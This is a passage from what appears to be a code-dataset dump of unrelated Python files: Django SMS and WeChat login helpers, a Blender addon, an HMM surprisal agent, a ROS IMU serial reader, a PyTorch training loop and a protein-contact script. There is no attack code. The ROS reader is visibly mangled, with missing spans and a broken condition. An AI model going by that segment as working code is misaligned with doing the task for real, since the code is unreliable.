'%Y%m%d'))\r\n if not os.path.exists(dir_path):\r\n os.makedirs(dir_path)\r\n filename = '{file_name}.{file_type}'.format(\r\n file_name=str(uuid.uuid4()).replace('-', ''), file_type=file_type)\r\n path = os.path.join(dir_path, filename)\r\n return path\r\n\r\n\r\ndef process_base64_in_content(post: dict) -> None:\r\n content: str = post.setdefault('content', '')\r\n if not content:\r\n return\r\n search_base64 = re.search('\\\"data\\:image\\/(.*?)\\;base64\\,(.*?)\\\"', content)\r\n if not search_base64:\r\n return\r\n image_type = search_base64.group(1)\r\n image_base64_string = search_base64.group(2)\r\n image_decode = base64.b64decode(image_base64_string)\r\n file_path = set_default_file_path(file_type=image_type)\r\n with open(file_path, 'wb') as f:\r\n f.write(image_decode)\r\n content = content.replace(\r\n search_base64.group(), '\\\"{path}\\\"'.format(path=file_path))\r\n post['content'] = content\r\n\r\n\r\ndef make_code(count: int=4) -> str:\r\n data = [str(random.randint(0, 9)) for i in range(count)]\r\n return ''.join(data)\r\n\r\n\r\ndef process_file_return_path(request,\r\n files_name: str='file',\r\n files_dir: str='image'):\r\n myFile = request.FILES.get(files_name)\r\n if not myFile:\r\n return\r\n if myFile:\r\n file_type = (myFile.name).split(\".\")[-1]\r\n file_path = set_default_file_path(file_type=file_type)\r\n with open(file_path, 'wb+') as f:\r\n for chunk in myFile.chunks():\r\n f.write(chunk)\r\n return file_path.replace('\\\\', '/')\r\n\r\n\r\ndef process_files_return_pathlist(request, files_dir: str='image'):\r\n myFiles = request.FILES\r\n data_list = []\r\n if myFiles:\r\n for myFile in myFiles.itervalues():\r\n file_type = (myFile.name).split(\".\")[-1]\r\n file_path = 
set_default_file_path(file_type=file_type)\r\n with open(file_path, 'wb+') as f:\r\n for chunk in myFile.chunks():\r\n f.write(chunk)\r\n data_list.append(file_path.replace('\\\\', '/'))\r\n return data_list\r\n\r\n\r\nclass TokenSerializer(object):\r\n\r\n def __init__(self, salt: str, overtime_sec: Type[DateSec]=DateSec.DAY):\r\n self.s = Serializer(salt, expires_in=overtime_sec)\r\n\r\n def encode(self, data: Dict[str, Any]) -> bytes:\r\n return self.s.dumps(data)\r\n\r\n def decode(self, data: bytes) -> Dict[str, Any]:\r\n return self.s.loads(data)\r\n\r\n\r\nclass SMS(object):\r\n # 阿里云大于短信客户端接口\r\n \"\"\"\r\n 阿里大于接口返回\r\n docstring here\r\n return data: {\r\n 'RequestId': '请求id',\r\n 'Code': '状态码',\r\n 'Message': '状态码描述',\r\n 'BizId': '回执id',\r\n }\r\n \"\"\"\r\n\r\n REGION = \"cn-hangzhou\"\r\n PRODUCT_NAME = \"Dysmsapi\"\r\n DOMAIN = \"dysmsapi.aliyuncs.com\"\r\n\r\n def __init__(self, ACCESS_KEY_ID, ACCESS_KEY_SECRET, sign_name,\r\n template_code):\r\n self.acs_client = AcsClient(ACCESS_KEY_ID, ACCESS_KEY_SECRET,\r\n self.REGION)\r\n region_provider.add_endpoint(self.PRODUCT_NAME, self.REGION,\r\n self.DOMAIN)\r\n\r\n self.sign_name = sign_name\r\n self.template_code = template_code\r\n\r\n # 发送信息\r\n def send_sms(self, phone: str, code: int, context: Union[None, Dict[str, Any]]=None):\r\n business_id = uuid.uuid1()\r\n smsRequest = SendSmsRequest.SendSmsRequest()\r\n smsRequest.set_TemplateCode(self.template_code)\r\n if context:\r\n smsRequest.set_TemplateParam(json.dumps(context))\r\n smsRequest.set_OutId(business_id)\r\n smsRequest.set_SignName(self.sign_name)\r\n smsRequest.set_PhoneNumbers(phone)\r\n\r\n smsResponse: bytes = self.acs_client.do_action_with_exception(smsRequest)\r\n return json.loads(smsResponse)\r\n\r\n def __unicode__(self):\r\n return self.PRODUCT_NAME\r\n\r\n\r\nclass WxLogin(object):\r\n # 网页端微信第三方登录接口\r\n def __init__(self, APPID, APPSECRET):\r\n self.appid = APPID\r\n self.secret = APPSECRET\r\n self.redirect_url = quote('https://www.cingta.com/')\r\n\r\n # 生成二维码url\r\n def create_code_url(self):\r\n return 'https://open.weixin.qq.com/connect/qrconnect?appid={APPID}&redirect_uri={redirrect_uri}&response_type=code&scope={scope}&state=STATE#wechat_redirect'.format(\r\n APPID=self.appid,\r\n redirrect_uri=self.redirect_url,\r\n scope='snsapi_login', )\r\n\r\n # 获取open_id\r\n def get_access_token(self, code):\r\n url = 'https://api.weixin.qq.com/sns/oauth2/access_token?appid={APPID}&secret={APPSECRET}&code={CODE}&grant_type=authorization_code'.format(\r\n APPID=self.appid,\r\n APPSECRET=self.secret,\r\n CODE=code, )\r\n resp = requests.get(url).json()\r\n return resp\r\n\r\n # 获取unionid\r\n @staticmethod\r\n def get_unionid(token, openid):\r\n url = 'https://api.weixin.qq.com/sns/userinfo?access_token={token}&openid={openid}'.format(\r\n token=token,\r\n openid=openid, )\r\n resp = requests.get(url).json()\r\n return resp.get('unionid')\r\n\r\n\r\nclass WXBizDataCrypt:\r\n # 微信小程序解码, 腾讯官方代码, 直接调用\r\n def __init__(self, appId, sessionKey):\r\n self.appId = appId\r\n self.sessionKey = sessionKey\r\n\r\n def decrypt(self, encryptedData, iv):\r\n sessionKey = base64.b64decode(self.sessionKey)\r\n encryptedData = base64.b64decode(encryptedData)\r\n iv = base64.b64decode(iv)\r\n\r\n cipher = AES.new(sessionKey, AES.MODE_CBC, iv)\r\n data = self._unpad(cipher.decrypt(encryptedData))\r\n decrypted = json.loads(data)\r\n\r\n if decrypted['watermark']['appid'] != self.appId:\r\n raise Exception('Invalid Buffer')\r\n\r\n return decrypted\r\n\r\n def _unpad(self, 
s):\r\n return s[:-ord(s[len(s) - 1:])]\r\n\r\n\r\nclass WxMiniInterface(object):\r\n # 微信小程序各种接口\r\n def __init__(self, APPID: str, APPSECRET: str):\r\n self.APPID = APPID\r\n self.APPSECRET = APPSECRET\r\n\r\n def get_user_session(self, code: str) -> Dict[str, str]:\r\n url = 'https://api.weixin.qq.com/sns/jscode2session?appid={AppID}&secret={AppSecret}&js_code={code}&grant_type=authorization_code'.format(\r\n AppID=self.APPID,\r\n AppSecret=self.APPSECRET,\r\n code=code, )\r\n resp = requests.get(url).json()\r\n return resp\r\n\r\n def get_user_info(self, session: str, encryptedata: str, iv: str) -> str:\r\n wx_mini = WXBizDataCrypt(self.APPID, session)\r\n userinfo = wx_mini.decrypt(encryptedata, iv)\r\n return userinfo\r\n\r\n def send_template_msg(self, **templatedata) -> Dict[str, str]:\r\n get_user_info = set(\r\n ['touser', 'template_id', 'page', 'form_id', 'data'])\r\n if not (get_user_info & set(templatedata.keys()) == get_user_info):\r\n raise TypeError(\r\n 'send_template_msg missing required positional arguments: touser, template_id, page, form_id or data'\r\n )\r\n\r\n token_url: str = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={APPID}&secret={APPSECRET}'.format(\r\n APPID=self.APPID,\r\n APPSECRET=self.APPSECRET, )\r\n token: Dict[str, str] = requests.get(token_url).json()\r\n if token.get('errcode'):\r\n raise TypeError('error APPID or error APPSECRET')\r\n _token = token.get('access_token', '')\r\n template_url: str = 'https://api.weixin.qq.com/cgi-bin/message/wxopen/template/send?access_token={ACCESS_TOKEN}'.format(\r\n ACCESS_TOKEN=_token, )\r\n resp = requests.post(\r\n template_url, data=json.dumps(templatedata)).json()\r\n return resp\r\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"95157509","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# Copyright 2011, Ryan Inch\n\nfrom bpy.types import PropertyGroup\nfrom bpy.props import StringProperty\n\nlayer_collections = {}\n\ncollection_tree = []\n\nexpanded = []\n\nmax_lvl = 0\nrow_index = 0\n\ndef get_max_lvl():\n return max_lvl\n\ndef update_col_name(self, context):\n if self.name != self.last_name:\n if self.name == '':\n self.name = self.last_name\n return\n\n if self.last_name != '':\n layer_collections[self.last_name][\"ptr\"].collection.name = self.name\n\n update_property_group(context)\n\n self.last_name = self.name\n\nclass CMListCollection(PropertyGroup):\n name: StringProperty(update=update_col_name)\n last_name: StringProperty()\n\n\ndef update_collection_tree(context):\n global max_lvl\n global row_index\n collection_tree.clear()\n layer_collections.clear()\n max_lvl = 0\n row_index = 0\n\n init_laycol_list = context.view_layer.layer_collection.children\n\n master_laycol = {\"id\": 0,\n \"name\": context.view_layer.layer_collection.name,\n \"lvl\": -1,\n \"row_index\": -1,\n \"visible\": True,\n \"has_children\": True,\n \"expanded\": True,\n \"parent\": None,\n \"children\": [],\n \"ptr\": context.view_layer.layer_collection\n }\n\n get_all_collections(context, init_laycol_list, master_laycol, collection_tree, visible=True)\n\n\ndef get_all_collections(context, collections, parent, tree, level=0, visible=False):\n global row_index\n global max_lvl\n \n if level > max_lvl:\n max_lvl = level\n\n for item in collections:\n laycol = {\"id\": len(layer_collections) +1,\n \"name\": item.name,\n \"lvl\": level,\n \"row_index\": row_index,\n \"visible\": visible,\n \"has_children\": False,\n \"expanded\": False,\n \"parent\": parent,\n \"children\": [],\n \"ptr\": item\n }\n\n row_index += 1\n\n layer_collections[item.name] = laycol\n tree.append(laycol)\n\n if len(item.children) > 0:\n laycol[\"has_children\"] = True\n\n if item.name in expanded and laycol[\"visible\"]:\n laycol[\"expanded\"] = True\n get_all_collections(context, item.children, laycol, laycol[\"children\"], level+1, visible=True)\n\n else:\n get_all_collections(context, item.children, laycol, laycol[\"children\"], level+1)\n\n\ndef update_property_group(context):\n update_collection_tree(context)\n context.scene.CMListCollection.clear()\n create_property_group(context, collection_tree)\n\n\ndef create_property_group(context, tree):\n global in_filter\n\n for laycol in tree:\n new_cm_listitem = context.scene.CMListCollection.add()\n new_cm_listitem.name = laycol[\"name\"]\n\n if laycol[\"has_children\"]:\n create_property_group(context, 
laycol[\"children\"])\n","sub_path":"object_collection_manager/internals.py","file_name":"internals.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"545225812","text":"import os\nimport argparse\nimport numpy as np\nimport math\nfrom hmmlearn import hmm\nfrom utils.helpers import *\n\n\ndef hmm_action_selection(model, state_seq, sample=False):\n \"\"\"\n Input: HMM model and a state_seq\n Output: Computes p(x_t|x_t-1,...,x_0)\n TODO: Make option to greedly select next action!\n \"\"\"\n valid_successors, moves = get_valid_succesor(wm, state_seq[-1])\n coded_successors = string_to_code(valid_successors, observations)[0]\n current_v_state, lengths = string_to_code([state_seq], observations)\n\n # One HMM State Transition\n logprob, posteriors = model.score_samples(current_v_state, lengths)\n cond_distr = np.matmul(model.emissionprob_.T,\n np.matmul(model.transmat_.T, posteriors.T))\n\n full_distr_next_v_state = cond_distr[:, -1].ravel()\n distr_next_v_state = full_distr_next_v_state[coded_successors].ravel()/sum(full_distr_next_v_state[coded_successors]).ravel()\n n_valid_v_states = len(distr_next_v_state)\n\n # Sample or argmax\n if sample:\n next_move = np.random.choice(n_valid_v_states, 1, p=distr_next_v_state)[0]\n else:\n next_move = np.argmax(distr_next_v_state)\n\n # next_v_state = valid_successors[0][next_move]\n return next_move, full_distr_next_v_state\n\n\n startprob, transmat, emissionprob = init_hmm(no_obs=3, n_states=2)\n model = hmm_posterior(seq.reshape(1, -1).T,\n startprob, transmat, emissionprob,\n get_ic=False)\n\n\nclass SBL_HMM():\n \"\"\"\n DESCRIPTION: Hidden Markov Model Bayesian Sequential Learning Agent\n * Agent parses a binary sequence previously generated by HHMM\n * She updates her HMM posterior with new evidence\n * She calculates different surprise measures as the come in\n INPUT: Binary Sequence and Exponentially Weighted forgetting parameter\n OUTPUT: Predictive surprisal, Bayesian surprisal, Confidence-corrected surprisal\n [t, o_t, s_t, Prediction_Surprise, Bayesian_Surprise, Confidence_Corrected_Surprise]\n \"\"\"\n def __init__(self, seq, hidden, n_states, model_type=\"SP\", verbose=False):\n # Initialize SBL-learned sequence and exponential forgetting parameter\n self.sequence = seq.astype(int)\n self.hidden = hidden\n self.T = len(seq)\n\n self.type = model_type\n self.n_states = n_states\n self.verbose = verbose\n print(self.n_states)\n\n self.no_obs = np.unique(seq).shape[0]\n self.stim_ind = np.zeros((self.T, self.no_obs))\n\n # Construct matrix where col represents binary ind of specific stim at t\n for t in range(self.T):\n self.stim_ind[t, self.sequence[t]] = 1\n\n # AP: Generate T-dim vector indicating no-alternation from t-1 to t\n self.repetition = np.zeros(self.T)\n for t in range(1, self.T):\n if self.sequence[t] == self.sequence[t-1]:\n self.repetition[t] = 1\n\n # TP: Generate T-dim vectors indicating transition from state i\n self.transitions = np.zeros((self.T, self.no_obs))\n for t in range(1, self.T):\n self.transitions[t, 0] = (self.sequence[t-1] == 0)\n self.transitions[t, 1] = (self.sequence[t-1] == 1)\n self.transitions[t, 2] = (self.sequence[t-1] == 2)\n\n if self.type == \"SP\":\n self.posterior = np.ones(self.no_obs)/self.no_obs\n elif self.type == \"AP\":\n self.posterior = np.ones(2)/2\n elif self.type == \"TP\":\n self.posterior = np.ones((self.no_obs, self.no_obs))/self.no_obs\n else:\n raise \"Provide right model type (SP, AP, TP)\"\n\n\n def update_posterior_old(self):\n if self.type == \"SP\":\n for i in range(self.no_obs):\n self.alphas[i] = 1 + np.dot(exp_weighting, self.stim_ind[:self.t+1, i])\n\n elif self.type == \"AP\":\n if self.t == 0:\n 
print(\"Can't update posterior with only one observation - need two!\")\n self.alphas[0] = 1\n self.alphas[1] = 1\n else:\n self.alphas[0] = 1 + np.dot(exp_weighting, self.repetition[:self.t+1])\n self.alphas[1] = 1 + np.dot(exp_weighting, 1-self.repetition[:self.t+1])\n\n elif self.type == \"TP\":\n # print(self.sequence[:t], self.transition_from_0[:t], self.transition_from_1[:t])\n if self.t == 0:\n print(\"Can't update posterior with only one observation - need two!\")\n self.alphas = np.ones((self.no_obs, self.no_obs))\n else:\n for i in range(self.no_obs):\n for j in range(self.no_obs):\n # from-to alphas\n self.alphas[i, j] = 1 + np.dot(exp_weighting, self.stim_ind[:self.t+1, j]*self.transitions[:self.t+1, i])\n\n def init_hmm(self):\n \"\"\"\n Input: number of desired hidden states for HMM model\n Output: Uniformly initialized matrices for HMM training\n \"\"\"\n startprob = np.repeat(1./self.n_states, self.n_states)\n transmat = np.repeat([startprob], self.n_states, axis=0)\n if self.type == \"SP\":\n temp = np.repeat(1./self.no_obs, self.no_obs)\n elif self.type == \"AP\":\n temp = np.repeat(1./2, 2)\n emissionprob = np.repeat([temp], self.n_states, axis=0)\n\n return startprob, transmat, emissionprob\n\n\n def calc_all_posteriors(self):\n \"\"\"\n Input: Unique state id transformed data, length per ep trace and HMM inits\n Output: The trained HMM model with all attributes\n - Option: If desired get AIC and BIC for model as well\n \"\"\"\n startprob, transmat, emissionprob = self.init_hmm()\n # Uniform Initialization\n model = hmm.MultinomialHMM(n_components=self.n_states)\n model.startprob = startprob\n model.transmat = transmat\n model.emissionprob = emissionprob\n\n if self.type == \"SP\":\n temp = self.sequence[:self.T+1].reshape(1, -1).T\n elif self.type == \"AP\":\n temp = self.repetition[:self.T+1].reshape(1, -1).T\n\n self.model = model.fit(temp)\n logprob, posteriors = model.score_samples(temp)\n return posteriors\n\n def posterior_predictive(self, posterior):\n return np.matmul(self.model.emissionprob_.T, np.matmul(self.model.transmat_.T, posterior.T))\n\n def naive_posterior(self, posterior):\n return self.posterior_predictive(posterior)/self.posterior_predictive(posterior).sum(axis=0)\n\n def predictive_surprisal(self, posterior, ind):\n return -np.log(self.posterior_predictive(posterior)[ind])\n\n def bayesian_surprisal(self, posterior_old, posterior):\n return kl_general(posterior_old, posterior)\n\n def corrected_surprisal(self, posterior):\n return kl_general(self.naive_posterior(posterior), posterior)\n\n def compute_surprisal(self, max_T, verbose_surprisal=False):\n print(\"{}: Computing different surprisal measures for {} timesteps.\".format(self.type, max_T))\n results = []\n\n hmm_init_posterior = np.repeat(1./self.n_states, self.n_states)\n hmm_posteriors = self.calc_all_posteriors()\n\n for t in range(max_T+1):\n # Loop over the full sequence and compute surprisal iteratively\n self.t = t\n if t == 0:\n posterior_old = hmm_init_posterior\n else:\n posterior_old = hmm_posteriors[t-1]\n\n posterior = hmm_posteriors[t]\n\n if self.type == \"SP\":\n ind = int(self.sequence[self.t])\n elif self.type == \"AP\":\n ind = int(self.repetition[self.t])\n elif self.type == \"TP\":\n # from and to stimulus transition\n ind = (np.argmax(self.transitions[self.t, :]), np.argmax(self.stim_ind[self.t, :]))\n else:\n raise \"Provide right model type (SP, AP, TP)\"\n\n PS_temp = self.predictive_surprisal(posterior, ind)\n BS_temp = self.bayesian_surprisal(posterior_old, 
posterior)\n CS_temp = self.corrected_surprisal(posterior)\n\n if verbose_surprisal:\n print(\"{} - t={}: PS={}, BS={}, CS={}\".format(self.type, t+1, round(PS_temp, 4), round(BS_temp, 4), round(CS_temp, 4)))\n\n temp = [t, self.sequence[t], self.hidden[t], PS_temp, BS_temp, CS_temp]\n distr_params = list(posterior.reshape(1, -1)[0])\n results.append(temp + distr_params)\n print(\"{}: Done computing surprisal measures for all {} timesteps.\".format(self.type, self.T))\n return np.asarray(results)\n\n\ndef main(seq, hidden, n_states, model_type,\n prob_regime_init, prob_obs_init, prob_obs_change, prob_regime_change,\n save_results=False, title=\"temp\", verbose=False):\n # II: Compute Surprisal for all time steps for Stimulus Prob CatDir Model\n CD_SBL_temp = SBL_Cat_Dir(seq, hidden, n_states, model_type, verbose)\n results = CD_SBL_temp.compute_surprisal(max_T=CD_SBL_temp.T)\n\n time = results[:,0]\n sequence = results[:, 1]\n hidden = results[:, 2]\n PS = results[:, 2]\n BS = results[:, 3]\n CS = results[:, 4]\n\n results_formatted = {\"time\": time,\n \"sequence\": sequence,\n \"hidden\": hidden,\n \"predictive_surprise\": PS,\n \"bayesian_surprise\": BS,\n \"confidence_corrected_surprise\": CS,\n \"prob_regime_init\": prob_regime_init,\n \"prob_obs_init\": prob_obs_init,\n \"prob_obs_change\": prob_obs_change,\n \"prob_regime_change\": prob_regime_change}\n\n if save_results:\n save_obj(results_formatted, results_dir + title)\n print(\"Saved in File: {}\".format(results_dir + title))\n\n\ndef test_agent(seq, hidden, n_states, model_type, verbose=False):\n # Test IIa: Initialize SBL (seq, forgetting param), update posterior (t=3)\n HMM_SBL_temp = SBL_HMM(seq, hidden, n_states, model_type=model_type)\n # Test IIb: Compute Surprisal once (SP, t=3)\n HMM_SBL_temp.compute_surprisal(max_T=3, verbose_surprisal=True)\n # print(\"---------------------------------------------\")\n # # Test IIc: Compute Surprisal for all time steps for Stimulus Prob BB Model\n # results = CD_SBL_temp.compute_surprisal(max_T=CD_SBL_temp.T)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-file', '--sample_file', action=\"store\",\n default=\"temporary_sample_title\", type=str,\n help='Title of file in which sequence in stored')\n parser.add_argument('-states', '--n_states', action=\"store\",\n default=2, type=int,\n help='Number of Hidden States in HMM')\n parser.add_argument('-model', '--model', action=\"store\", default=\"SP\",\n type=str,\n help='Categorical Dirichlet Probability Model (SP, AP, TP)')\n parser.add_argument('-pkl_in', '--pickle', action=\"store_true\", help='Load matlab sequence file.')\n parser.add_argument('-T', '--test', action=\"store_true\", help='Run tests.')\n parser.add_argument('-S', '--save', action=\"store_true\", help='Save results to array.')\n parser.add_argument('-v', '--verbose',\n action=\"store_true\",\n default=False,\n\t\t\t\t\t\thelp='Get status printed out')\n\n args = parser.parse_args()\n\n if args.pickle:\n sample = load_obj(results_dir + args.sample_file + \".pkl\")\n else:\n sample = load_obj(results_dir + args.sample_file + \".mat\")\n\n seq = sample[\"sample_output\"][:, 2]\n hidden = sample[\"sample_output\"][:, 1]\n\n prob_regime_init = sample[\"prob_regime_init\"]\n prob_obs_init = sample[\"prob_obs_init\"]\n prob_obs_change = sample[\"prob_obs_change\"]\n prob_regime_change = sample[\"prob_regime_change\"]\n\n n_states = args.n_states\n model = args.model\n\n run_test = args.test\n save_results = args.save\n verbose = 
args.verbose\n\n if run_test:\n print(\"Started running basic tests.\")\n test_agent(seq, hidden, n_states, model, verbose)\n\n else:\n main(seq, hidden, n_states, model,\n prob_regime_init, prob_obs_init, prob_obs_change,\n prob_regime_change,\n save_results, title=\"HMM_\" + model + \"_\" + args.sample_file,\n verbose=False)\n\n \"\"\"\n How to run:\n pythonw seq_gen.py -t S1_800 -obs_change 0.75 0.15 0.85 0.25 0.5 0.75 0.25 0.5 -order 2 -matlab -seq 500\n pythonw sbl_hmm.py -file S1_800 -S -model SP\n \"\"\"\n","sub_path":"sbl_agents/sbl_hmm.py","file_name":"sbl_hmm.py","file_ext":"py","file_size_in_byte":12721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"402603158","text":"import setuptools\nmy_math = setuptools.Extension('my_package.math',\n sources = ['my_package/math/math11.cpp'],\n extra_compile_args = ['-std=c++11'],\n)\n\nsetuptools.setup(\n name = 'my-project',\n version = '0.0.1',\n author = 'Mechazawa',\n license = 'BSD',\n ext_modules = [my_math],\n packages = ['my_package'],\n)\n","sub_path":"building-python/my-package/setuptools-ext11.py","file_name":"setuptools-ext11.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"421855677","text":"#!/usr/bin/env python\n\nimport roslib; roslib.load_manifest('imu_broadcaster')\nimport math\nimport rospy\nimport serial\nimport string\nimport numpy as np\nfrom geometry_msgs.msg import Quaternion\nimport tf\n\n# Buffer length\naddresses = ['C0:82:26:31:22:48','C0:82:38:31:5E:48','C0:82:1D:30:25:4D']\nadd_len = 6\nN_devices = len(addresses)\ncount_imu = 1\n# x=1:500000000;\n# N_samples = length(x);\n# R10 = eye(3,3);\n# R20 = eye(3,3);\n# R30 = eye(3,3);\nbuffLen = 34\npckLen = 27\ne = 0\nePrev = 0\nquat1 = [0]*4\nquat2 = [0]*4\nquat_total = []\nquat = [0]*4\nfor i in range(0, N_devices):\n quat_total.append(quat)\n \n\ndef parse_data(data):\n global quat_total\n showing = 0\n showing_index = 0\n RxBuff = [0]*buffLen\n RxBuff_prev = []\n ij_prev = 0\n counter = 1\n \n # if(cval==1)\n # count_imu = 1;\n # end\n for i in range(0, buffLen):\n # print ord(data[i])\n # print hex(ord(data[i]))\n # RxBuff[i] = ord(data[i])\n RxBuff[i] = (data[i])\n # if(RxBuff[i]==0xC0):\n # showing = 1\n # if(showing == 1):\n # print(hex(RxBuff[i]))\n # showing_index = showing_index +1\n # if(showing_index == 6):\n # showing = 0\n # # RxBuff = data\n ij = 0\n if(ij_prev>(buffLen-pckLen)):\n RxBuff = RxBuff_prev[ij_prev:len(RxBuff_prev)].extend(RxBuff)\n buffLen_new = len(RxBuff)\n \n while ij <= (buffLen_new-pckLen):\n found_device = 0\n address = ''\n for i in range(0, add_len):\n address = address + \"{:02X}\".format(RxBuff[ij+add_len-1-i])\n if(i=buffLen):\n parse_data(data)\n \n quat_sent = Quaternion()\n quat_sent.w = quat_total[0][0]\n quat_sent.x = quat_total[0][1]\n quat_sent.y = quat_total[0][2]\n quat_sent.z = quat_total[0][3]\n quat_fore_pub.publish(quat_sent)\n quat_sent = Quaternion()\n quat_sent.w = quat_total[1][0]\n quat_sent.x = quat_total[1][1]\n quat_sent.y = quat_total[1][2]\n quat_sent.z = quat_total[1][3]\n quat_should_pub.publish(quat_sent)\n quat_sent = Quaternion()\n quat_sent.w = quat_total[2][0]\n quat_sent.x = quat_total[2][1]\n quat_sent.y = quat_total[2][2]\n quat_sent.z = quat_total[2][3]\n quat_upper_pub.publish(quat_sent)\n # # Split the serial data into several words separated by space\n # words = data.split()\n # # Get the length of the data array\n # word_len = len(words)\n # rate.sleep()\n except KeyboardInterrupt:\n ser.close()\n print(\"Bye\")\n\nif __name__ == '__main__':\n try:\n read_wrist()\n except rospy.ROSInterruptException: pass","sub_path":"nodes/read_serial_imu.py","file_name":"read_serial_imu.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"486204109","text":"import os\nimport time\n\nimport torch\nimport torch.nn.functional as F\n\nimport ignite\nfrom ignite.engine import create_supervised_trainer\nfrom ignite.engine import create_supervised_evaluator\nfrom ignite.engine import Events\nfrom ignite.handlers.early_stopping import EarlyStopping\n\nimport backdoor_attack as bd\n\nclass Trainer:\n def __init__(self, train_ds, test_ds, model, device):\n self.train_ds = train_ds\n self.test_ds = test_ds\n self.model = model\n self.device = device\n self.util = bd.device_util(self.device)\n\n def run(self, optimizer, epoch, out):\n self.model.to(self.device)\n self.optimizer = optimizer(self.model.parameters())\n self.optimizer.step()\n\n trainer = create_supervised_trainer(\n self.model,\n self.optimizer,\n F.cross_entropy,\n device=self.device\n )\n\n evaluator = create_supervised_evaluator(\n self.model,\n metrics={\n 'acc' : ignite.metrics.Accuracy(),\n 'loss' : ignite.metrics.Loss(F.cross_entropy)\n },\n device=self.device\n )\n\n self.log = {\n 'train/loss': [],\n 'test/loss': [],\n 'train/accuracy': [],\n 'test/accuracy': []\n }\n\n self.max_acc = 0\n @trainer.on(Events.EPOCH_COMPLETED)\n def logger(engine):\n # Evaluation against training dataset\n evaluator.run(self.train_ds)\n tr_loss = evaluator.state.metrics['loss']\n tr_acc = evaluator.state.metrics['acc']\n\n # Evaluation against test dataset\n evaluator.run(self.test_ds)\n te_loss = evaluator.state.metrics['loss']\n te_acc = evaluator.state.metrics['acc']\n\n # Save the best model\n if te_acc > self.max_acc:\n self.max_acc = te_acc\n self.model.to('cpu')\n # Save result\n torch.save(self.model.state_dict(), os.path.join(out, 'best_model.pt'))\n self.model.to(self.device)\n\n # Report\n time_elp = time.time()-self.time_st\n print(\n \"{}/{} Epoch, Train/Test Loss: {:.4f}/{:.4f}, \\\n Train/Test Accuracy: {:.4f}/{:.4f}, \\\n Elapsed/Remaining time: {:.2f}/{:.2f} [min]\"\n .format(\n engine.state.epoch,\n engine.state.max_epochs,\n tr_loss,\n te_loss,\n tr_acc,\n te_acc,\n time_elp/60,\n ( (time_elp/engine.state.epoch) * (engine.state.max_epochs-engine.state.epoch) ) / 60\n )\n )\n\n # logs\n self.log['train/loss'].append(tr_loss)\n self.log['test/loss'].append(te_loss)\n self.log['train/accuracy'].append(tr_acc)\n self.log['test/accuracy'].append(te_acc)\n\n self.time_st = time.time()\n trainer.run(self.train_ds, max_epochs=epoch)\n self.time_elp = self.time_st - time.time()\n\n self.model.to('cpu')\n","sub_path":"backdoor_attack/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"653746367","text":"from django.shortcuts import render, redirect,reverse\nfrom django.core.mail import send_mail\nfrom django.contrib import messages,auth\nfrom accounts.models import Token\nimport sys\n\n# Create your views here.\n\n\ndef send_login_email(request):\n email = request.POST['email']\n token=Token.objects.create(email=email)\n url=request.build_absolute_uri(\n reverse('accounts:login')+'?token='+str(token.uid)\n )\n send_mail(\n 'Your login link for Superlists',\n 'Use this link to log in:\\n\\n'+url,\n 'jzl1091889012@163.com',\n [email]\n )\n\n messages.success(\n request,\n \"Check your email,we've sent you a link you can use to log in\"\n )\n\n # messages框架第二种写法\n # messages.add_message(\n # request,\n # messages.SUCCESS,\n # \"Check your email,we've sent you a link you can use to log in\"\n # )\n return redirect('/')\n\ndef login(request):\n print('login view',file=sys.stderr)\n uid=request.GET.get('token')\n user=auth.authenticate(uid=uid)\n if user is not None:\n auth.login(request,user)\n return redirect('/')","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"439256903","text":"import glob\nimport os\nimport prody\nfrom multiprocessing import Pool\nfrom compress_pickle import dump\n\ndef training_with_multiprocessing(radius, number_of_processors, path_training_folders):\n training_data = {}\n pool = Pool(processes=number_of_processors)\n multiple_results = []\n for folder in glob.glob(path_training_folders):\n pdb_list = glob.glob(os.path.join(folder, \"*.pdb\"))\n for pdb_file in pdb_list:\n multiple_results.append(pool.apply_async(environment_creator, (pdb_file, radius)))\n for result in multiple_results:\n observed_contacts_dictionary = result.get()\n for pair_residues, target_residue_dictionary in observed_contacts_dictionary.items():\n if pair_residues in training_data:\n for target_residue, observed_contacts in target_residue_dictionary.items():\n if target_residue in training_data[pair_residues]:\n training_data[pair_residues][target_residue] += observed_contacts\n else:\n training_data[pair_residues][target_residue] = observed_contacts\n else:\n training_data[pair_residues] = target_residue_dictionary\n pool.terminate()\n\n return training_data\n\ndef environment_creator(pdb_file, radius):\n observed_contacts_dictionary = {}\n radius = str(radius)\n pdb = prody.parsePDB(pdb_file)\n pdb_chains_list = pdb.getChids()\n\n for chain in set(pdb_chains_list):\n chain_interface = pdb.select('(ca same residue as within '+ radius +'.00 of (noh chain '+ chain +')) and not chain '+ chain +'')\n if chain_interface is None:\n continue\n\n for residue_id, number_id, chain_id, icode_id, atom_id in zip(chain_interface.getResnames(), chain_interface.getResnums(), 